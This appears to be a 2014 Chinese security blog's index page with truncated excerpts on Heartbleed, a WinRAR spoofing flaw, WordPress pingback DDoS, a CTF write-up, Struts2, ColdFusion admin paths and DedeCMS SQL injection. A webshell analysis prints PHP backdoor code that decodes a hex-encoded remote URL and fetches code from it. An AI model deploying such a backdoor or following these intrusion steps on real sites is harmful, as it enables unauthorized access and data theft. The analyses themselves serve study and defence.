显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

Minghacker

凡你醉处 你说过 皆非他乡

 
 
 
 

焦点头图

 
 
聚焦图片加载中...
 
 
 
 
 

Every Second Counts

 
 
模块内容加载中...
 
 
 
 
 
 
 

python轻松读取sqlite

2014-4-14 20:34:02 阅读47 评论0 142014/04 Apr14

#-*- coding:utf-8 -*-

import sqlite3

cx = sqlite3.connect("GPClient.db")

cu = cx.cursor()

cu.execute("select * from Login")

a = cu.fetchall()

print a

作者  | 2014-4-14 20:34:02 | 阅读(47) |评论(0) | 阅读全文>>

闲扯“心脏出血”的OpenSSL漏洞

2014-4-11 21:28:54 阅读89 评论4 112014/04 Apr11

openssl漏洞出现快一周了,我也看到各大运维简单的升级修复和甲方乙方的忙碌和一起大黑客的身影。

#http://yxmhero1989.blog.163.com/blog/static/112157956201431191123404/

洞因

OpenSSL在处理心跳请求包时,没有对length字段(占2byte,可以标识的数据长度为64KB)和后续的data字段做合规检测。生成心跳响应包时,直接用了length对应的长度,从堆空间申请了内存,既便是真正的请求data数据远远小于length标识的长度。造成了可以读取内存64k的内容,而这些内容有你无法想象的内容,可能有cookie,有密码

,有源代码。。。

受影响版本

OpenSSL1.0.1、1.0.1a 、1.0.1b 、1.0.1c 、1.0.1d 、1.0.1e、1.0.1f、Beta 1 of OpenSSL 1.0.2等版本。

影响面

该漏洞不仅是涉及到https开头的网址,还包含间接使用了OpenSSL代码的产品和服务,比如,VPN、邮件系统、FTP工具等产品和服务,甚至可能会涉及到其他一些安全设施的源代码。

作者  | 2014-4-11 21:28:54 | 阅读(89) |评论(4) | 阅读全文>>

WinRar 4.20 – 文件扩展名欺骗(0Day)

2014-3-29 19:34:48 阅读82 评论0 292014/03 Mar29

WinRar 是常用的压缩与解压缩软件工具。它能将数据压缩成.rar或则.zip格式的包。这篇文章就是给大家呈现Winrar 4.20的一个最新漏洞(0 day),下面是关于zip文件的相关简要介绍。

Offset Bytes Description[25] 00 4 Local file header signature = 0x04034b50 (read as a little-endian number) 04 2 Version needed to extract (minimum) 06 2 General purpose bit flag 08 2 Compression method 10 2 File last modification time 12 2 File last modification date 14 4 CRC-32 18 4 Compressed size 22 4 Uncompressed size 26 2 File name length

作者  | 2014-3-29 19:34:48 | 阅读(82) |评论(0) | 阅读全文>>

超过16W的WordPress网站被用来做DDoS攻击

2014-3-19 22:27:16 阅读87 评论0 192014/03 Mar19

From:http://drops.wooyun.org/news/1062

任何开启了Pingback(默认就开启)的WordPress的站点可以被用来做DDOS攻击其它服务器。

看如下日志:

1

2

3

4

5

74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com"

121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com"

217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr"

193.197.34.216 - - [09/Mar/2014:11:05:27 -0400]

作者  | 2014-3-19 22:27:16 | 阅读(87) |评论(0) | 阅读全文>>

BCTF Writeup

2014-3-19 21:54:31 阅读161 评论2 192014/03 Mar19

From:http://drops.wooyun.org/papers/1071

team:我是狗汪汪

author:redrain,金龟子,ztz,hellove,cbuteng,琴心剑气,saline

0x00 MISCMISC100初来乍到

描述

米特尼克刚到中国人生地不熟,想要找到一些中国的黑客朋友帮助他,他知道Capture The Flag夺旗竞赛是黑客云集的地方,于是也报名参加了中国第一次全国性的CTF大赛 @BCTF百度杯网络安全技术对抗赛。而要进入BCTF圈交流,米特尼克需关注并@BCTF百度杯网络安全技术对抗赛,才能找到一个密语。

解题

很简单,微博上at了后会多个粉丝,查看简介即有flag。

MISC200内网冒险

描述

为了收集更多参加 BCTF 大赛的中国黑客朋友的信息,米特尼克决定尝试渗透进入 BCTF 的内网以获取更多的信息。通过信息搜集和网络监听,他发现了进入内部数据库的一个入口代理,并且在代理入口处拿到了少量流量数据。正当他想继续收集更多信 息的时候,他的行迹被发现并被踢出了网络。 http://bctf.cn/files/downloads /misc200_23633b6b34ccf6f2769d35407f6b2665.pcap 入口代理:218.2.197.236:12345

作者  | 2014-3-19 21:54:31 | 阅读(161) |评论(2) | 阅读全文>>

Struts2的getClassLoader漏洞利用

2014-3-19 21:32:30 阅读64 评论0 192014/03 Mar19

From:http://drops.wooyun.org/papers/1151

博文作者:By 空虚浪子心 http://www.inbreak.net

0x00 摘要

2012年,我在《攻击JAVA WEB》,文中提多关于“classLoader导致特定环境下的DOS漏洞”,当时并没有更加深入的说明,这几天struts官方修补了这个漏洞,本文是对这个漏洞的深入研究。

0x01 正文

这一切,得从我们控制了classLoader说起,曾经写过一篇文章,提到了一个小小的技术细节,非常不起眼的一个鸡肋。 引用《Spring framework(cve-2010-1622)漏洞利用指南》

Struts2其实也本该是个导致远程代码执行漏洞才对,只是因为它的字段映射问题,只映射基础类型,默认不负责映射其他类型,所以当攻击者直接提交URLs[0]=xxx时,直接爆字段类型转换错误,结果才侥幸逃过一劫罢了。

tomcat8.0出来后,这个问题爆发了,这是一个鸡肋漏洞的逆袭。

作者  | 2014-3-19 21:32:30 | 阅读(64) |评论(0) | 阅读全文>>

PHP后门新玩法:一款猥琐的PHP后门分析

2014-3-19 21:17:50 阅读106 评论0 192014/03 Mar19

作者: GENXOR   [转载请注明出处自  :  360网站卫士博客-blog.wangzhan.360.cn]

0x00 背景

近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。

0x01 细节

Webshell代码如下:

1

2

3

4

5

6

7

8

9

<?php

error_reporting(0);

session_start();

header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))

$_SESSION['api']=substr(file_get_contents(

sprintf('%s?%s',pack("H*",

'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);

@preg_repla

作者  | 2014-3-19 21:17:50 | 阅读(106) |评论(0) | 阅读全文>>

FileZilla 连接超时 读取目录列表失败问题

2014-3-17 21:45:06 阅读61 评论0 172014/03 Mar17

From:http://hi.baidu.com/312102021/item/7ebd364408b88cbcdf2a9ff6

FileZilla 连接超时 读取目录列表失败问题

有其它工具或者是客户端可以连接成功的情况下只有本机连接超时读取目录列表失败

确认是否通过了防火墙,

修改传输模式为主动或者被动

有时可能需要重启电脑才生效

作者  | 2014-3-17 21:45:06 | 阅读(61) |评论(0) | 阅读全文>>

【.NET小科普之一】数据库信息在哪儿

2014-3-4 21:09:12 阅读76 评论0 42014/03 Mar4

From:http://drops.wooyun.org/tips/975

0x00 前言

最近有人问到ASP.NET里面的数据库连接信息一般去哪里找。

这里我简单总结一下我遇到过的一些情况,和大家分享一些简单的方法去找ASP.NET的数据库连接信息或数据库文件。

0x01 寻找方式

先说一般的数据库连接信息。

第一种

一般在web.config,如某套OA就是将连接字符串存放在该文件内,如下图:

第二种

有的ASP.NET程序功能较多,会自定义其它config文件,所以可能会存在多个config,而数据库连接信息就存放在其它config文件中,比如逐浪CMS(你们懂的)就有多个config文件,如下图:

但数据库相关连接信息存放在Config\ConnectionStrings.config里:

第三种

也有更标新立异的压根不存放在config中,比如信游(你们也懂的)的免费版,也有一个config文件夹,里面的文件大致如下:

数据库连接信息存放在server.apb中:

第四种

有一些比较奇葩的,直接写在代码中。这种情况下如果没有源码cs文件,就只能反编译bin目录下的dll文件了,必须扩展开来说,这是后话了。

数据库文件

作者  | 2014-3-4 21:09:12 | 阅读(76) |评论(0) | 阅读全文>>

渗透测试:从“黑掉Github”学Web安全开发

2014-2-28 21:51:22 阅读148 评论0 282014/02 Feb28

这个文章涉及到一些理论的东西,国内的脚本小子都是只会玩工具,缺少漏洞原理基础,文章写的很详细,所以分享一下。

Egor Homakov(Twitter: @homakov 个人网站: EgorHomakov.com)是一个Web安全的布道士,他这两天把github给黑了,并给github报了5个安全方面的bug,他在他的这篇blog——《How I hacked Github

again
》(墙)说明了这5个安全bug以及他把github黑掉的思路。Egor的这篇文章讲得比较简单,很多地方一笔带过,所以,我在这里用我的语言给大家阐述一下黑掉Github的思路以及原文中所提到的那5个bug。希望这篇文章能让从事Web开发的同学们警惕。关于Web开发中的安全事项,大家可以看看这篇文章《Web开发中的你需要了解的东西

OAuth简介

首先,这个故事要从

作者  | 2014-2-28 21:51:22 | 阅读(148) |评论(0) | 阅读全文>>

DedeCMS全版本通杀SQL注入漏洞分析和利用工具

2014-2-28 19:38:12 阅读469 评论0 282014/02 Feb28

Title:DedeCMS全版本通杀SQL注入漏洞分析和利用工具

From:http://yxmhero1989.blog.163.com/blog/static/112157956201412873040614/

Author:Minghacker

1.分析:(From 基友My5t3ry)

http://loudong.360.cn/blog/view/id/16

对比补丁后发现,25号发布的源码修改了5个文件,其中的/member/buy_action.php文件补丁对比如图1。

很明显mchStrCode函数加强了加密强度,补丁前是简单的异或算法,但是织梦25号发布的补丁旨在修复乌云提交的两个注入,

这个函数可能有猫腻,搜索调用该函数的文件,如图2。

接着看到/member/buy_action.php的22 - 40行代码:

if(isset($pd_encode) && isset($pd_verify) && md5("payment".$pd_encode.$cfg_cookie_encode) == $pd_verify)

作者  | 2014-2-28 19:38:12 | 阅读(469) |评论(0) | 阅读全文>>

北漂程序员边城的幸福生活

2014-2-23 20:47:25 阅读72 评论0 232014/02 Feb23

http://www.freebuf.com/news/others/26497.html

边城

赵边城是我的发小,我们上了同样的小学和中学,又同时来到北京。

赵边城毕业后先后加入了BAT这种重量级别的互联网公司。

赵边城从十五年前,就开始写软件了。为了一个女人。

春节同学聚会相遇,相约同行回京,一路瞎扯,绿水青山不再,少年壮志未酬。

一、火车票

“把机票退了吧,明天和我一起坐火车回北京去!”

边城坐在沙发角上,眨眨眼殷切地望着我。KTV里中学同学聚会刚散去,满地的烟头和果壳,桌上杯盘狼藉。

“别纠结了,就我们俩回北京,都多少年了,再一起坐次火车嘛!”

“我来帮你买车票,你赶紧退机票,整体还能便宜点。火车多费不了几个钟头的。我跟你讲,到了首都机场,排队等出租都得排上两个多钟头……快点快点,给你用下我做的软件,抢车票好方便的说……”

我还在犹豫,边城就已经麻利地从他的双肩背里掏出笔记本,用iPhone大方地开了个热点,他打开总挂在嘴边的抢票软件,要动真格买车票了。

“今天买明天去北京的车票,买不到的吧,返程高峰,早卖光了吧?”

“你讲的对,的确不好抢,概率很小的,不过我做的这个抢票软件会一直持续刷退票的,正好碰下运气嘛,如果抢到了,就是天注定的,要是实在抢不到,你再坐你的飞机去。”

作者  | 2014-2-23 20:47:25 | 阅读(72) |评论(0) | 阅读全文>>

人物:他是互联网世界的私家侦探

2014-2-23 18:08:05 阅读68 评论0 232014/02 Feb23

From:http://www.freebuf.com/articles/people/26523.html

旧金山——过去一年,东欧的网络罪犯六次窃取了布雷恩·克雷布斯(Brian Krebs)的身份,搞垮了他的网站,在他们的恶意软件代码中写入了他的名字和一些令人不快的字眼,把粪便和海洛因送到他家门口,还打电话把特警队叫到了他家,当时,他的母亲正好到他家吃晚饭。

他说,“我无法想象邻居是如何看我的。”

41岁的克雷布斯在努力写一些别处看不到的文章。他的网络安全博客“克雷布斯论安全”(Krebs on Security)读者众多,关注的是互联网世界里极其黑暗的一个角落:唯利是图的网络犯罪。这些罪犯很多在东欧,通过医药销售、恶意软件、垃圾邮件、诈骗和盗窃捞取了数十亿财富,克雷布斯最近率先揭露的Adobe、塔吉特百货公司(Target)和尼曼·马库斯百货公司(Neiman Marcus)网络窃案就是其中几例。

他对这个角落的报道如此执拗,和他的报道对象的执拗程度都不相上下了,这让他赢得了对方的尊重,偶尔也会有愤怒。

克雷布斯曾是《华盛顿邮报》(The Washington Post)的一名记者,他利用在跑步机上锻炼的时间自学了俄语,他写博客时身旁放一把12号霰弹枪,他对地下数字世界的报道如此深入,以至于他和一些主要的俄罗斯网络罪犯都有了直呼名字的交情。有许

作者  | 2014-2-23 18:08:05 | 阅读(68) |评论(0) | 阅读全文>>

Hacking ColdFusion

2014-2-20 22:56:59 阅读138 评论0 202014/02 Feb20

一、前言:

去年的Adobe 3800万用户和PS源码泄露,大家都注意到了Coldfusion,Darkray童鞋和Master基友都写了2篇博文解说。恰好遇到过好几次,我也总结一下。

二、正文:

0x01:进后台

默认路径:

/cfide/administrator

/cfide/administrator/index.cfm

现在一般都是IIS的403限制了访问,基本难搞。

0x02:查看版本号

1.后台界面直接看到版本: cfide/administrator

2.进不了后台可以看到详细版本:CFIDE/adminapi/base.cfc?wsdl   (7-9)

0x03:Enterprise vs Standard?

一般情况是404 vs 500 ,执行/xxxx.jsp 404的是Enterprise版,500的是Standard;

Enterprise版本如果有jsp服务,那也有可能不是404.

0x04:其他Path

/cfide/componentutils

/cfide/componentutils/login.cfm

/cfide/adminapi/administrator.cfc?method=getSalt

Coldfusion 8 Fckeditor 2.6.4.1之前

作者  | 2014-2-20 22:56:59 | 阅读(138) |评论(0) | 阅读全文>>

信息收集利器Foca final version

2014-2-13 23:50:40 阅读178 评论0 132014/02 Feb13

From:http://yxmhero1989.blog.163.com/blog/static/1121579562014113115040374/

信息收集利器Foca final version

一直想给大家推荐Foca,迫于之前用的都是free版本

现在foca出了final version

FOCA Final Version, the ultimate FOCA

Foca是款西班牙同僚开发的信息收集安全利器

官网:http://www.elevenpaths.com/lab.html

主要对DNS和metadata元数据扫描还不错  Vul扫描似乎不给力

FOCA(指纹与组织档案馆收集的)主要是用于检查元数据和隐藏信息的文件的工具。这些文件可以是网页,而FOCA可以下载和分析。

文件可以分析是多种多样的,最常见的Microsoft Office文件,打开Office或PDF文件,而且还分析了Adobe公司的InDesign文件,或SVG的例子。这些文件是使用三个可能的搜索引擎是谷歌,Bing和Exalead的搜查。三发动机的总和使得获得了大量的文档。也有添加??本地文件来从图像文件中提取EXIF信息的可能性,甚至在文件下载做出的通过URL发现的信息进行全面分析。

作者  | 2014-2-13 23:50:40 | 阅读(178) |评论(0) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 
 
心情随笔列表加载中...
 
 
 
 
 

阁主寄语

 
 
模块内容加载中...
 
 
 
 
 
 
 

上海市 徐汇区 摩羯座

 发消息  写留言

 
一个在当地较为英俊的人。一堆好人卡,已经有一株鲜花绑定好了,是小北的小太阳臭螃蟹。爱好写词摄影和美女。专注编程和安全。略懂,略懂 CSS+Js+jquery+php+python+perl+Yii+SSH+Flex+as3+asp.net。略懂C++/C#/WPF/Java/Delphi/VB/Asm/Qt。
 
近期心愿却道天凉好个秋
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 

日志分类

 
 
日志分类列表加载中...
 
 
 
 
 

标签

 
 
数据加载中...
 
 
 
 
 
 
 
列表加载中...
 
 
 
 
 
 
 
博友列表加载中...
 
 
 
 
 
 
 
模块内容加载中...
 
 
 
 
 
 
 
日志评论
评论列表加载中...
 
 
 
 
 
 我要留言
 
 
 
留言列表加载中...
 
 
 
 
 

轻松一刻

 
 
模块内容加载中...
 
 
 
 
 

藏书一叠

 
 
模块内容加载中...
 
 
 
 
 
 
 
 
 
 
 
网易云音乐 曲目表歌词秀
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2014

创建博客 登录  
 加关注